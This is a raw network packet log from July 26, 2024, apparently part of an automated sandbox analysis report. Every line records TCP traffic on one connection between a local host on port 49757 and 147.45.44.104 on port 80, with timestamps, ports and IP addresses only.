Jul 26, 2024 18:56:40.346533060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.346575975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.346575975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.346652031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.346662045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.346671104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.346681118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.346688032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.346704960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.346730947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.347098112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.347109079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.347119093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.347127914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.347136021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.347156048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.347237110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.347248077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.347280025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.348041058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.348052025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.348061085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.348071098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.348079920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.348095894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.348117113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.348944902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.348954916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.348963976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.348974943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.348984957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.348988056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.348999023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.349005938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.349021912 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.349050045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.349708080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.349720001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.349730015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.349756956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.349782944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.349848032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.349859953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.349886894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.349900961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.350642920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.350655079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.350666046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.350682020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.350684881 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.350688934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.350691080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.350703955 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.350735903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.351370096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.351382017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.351535082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.351538897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.351552963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.351563931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.351576090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.351578951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.351632118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.352333069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.352391005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.352508068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.352519989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.352531910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.352544069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.352556944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.352586985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.353266954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.353280067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.353291035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.353303909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.353316069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.353334904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.353405952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.353419065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.353441954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.353466988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.354202986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.354219913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.354231119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.354242086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.354252100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.354257107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.354285955 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.354969978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.354983091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.354993105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.355005026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.355016947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.355016947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.355035067 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.355055094 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.355103016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.355143070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.355874062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.355886936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.355895996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.355909109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.355920076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.355925083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.355928898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.355956078 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.355971098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.356604099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.356616020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.356661081 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.356753111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.356765032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.356775999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.356832981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.357640028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.357652903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.357662916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.357667923 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.357675076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.357686043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.357686043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.357696056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.357703924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.357708931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.357722044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.357749939 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.358386040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.358398914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.358409882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.358421087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.358433008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.358433008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.358447075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.358450890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.358459949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.358469963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.358472109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.358495951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.358520985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.359288931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.359301090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.359337091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.359438896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.359452009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.359462976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.359474897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.359478951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.359487057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.359498024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.359509945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.359539986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.360316038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.360328913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.360338926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.360351086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.360361099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.360372066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.360373020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.360388994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.360394001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.360409975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.360435009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.360460997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.360493898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.361254930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.361299038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.361397028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.361408949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.361418962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.361432076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.361443043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.361449003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.361457109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.361468077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.361470938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.361491919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.361515045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.362175941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.362189054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.362217903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.362232924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.362324953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.362338066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.362349987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.362359047 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.362361908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.362374067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.362396002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.362409115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.363141060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.363154888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.363164902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.363172054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.363183022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.363193989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.363198042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.363220930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.363236904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.363771915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.363784075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.363795042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.363806009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.363812923 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.363817930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.363830090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.363832951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.363861084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.363910913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.363924026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.363945007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.363967896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.364644051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.364658117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.364666939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.364680052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.364691019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.364695072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.364722967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.364737988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.364784002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.364795923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.364806890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.364820957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.364835024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.364856005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.367856026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.367870092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.367880106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.367891073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.367902994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.367928982 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.367954969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.368010044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368021965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368032932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368043900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368046999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.368057013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368072033 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.368099928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.368191004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368204117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368213892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368226051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368228912 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.368237972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368247032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.368251085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368263006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368275881 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.368302107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.368335009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368346930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368357897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368367910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368374109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.368379116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368390083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368401051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.368402004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368426085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.368442059 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.368964911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368977070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368987083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.368999004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.369008064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.369013071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.369024038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.369035959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.369040966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.369048119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.369057894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.369086981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.369678020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.369689941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.369699955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.369720936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.369739056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.370271921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.370284081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.370294094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.370306015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.370316982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.370321989 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.370330095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.370341063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.370348930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.370374918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.370994091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.371038914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.371154070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.371165991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.371176004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.371186972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.371196985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.371201038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.371208906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.371232986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.371249914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.371743917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.371788025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.371893883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.371906996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.371917963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.371937037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.371953011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.372037888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.372050047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.372061014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.372070074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.372101068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.372632980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.372647047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.372658014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.372669935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.372682095 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.372703075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.372776031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.372788906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.372798920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.372809887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.372812033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.372833967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.372859955 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.373589039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.373600960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.373611927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.373624086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.373637915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.373665094 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.373771906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.373784065 CEST	80	49757	147.45.44.104	192.168.2.4
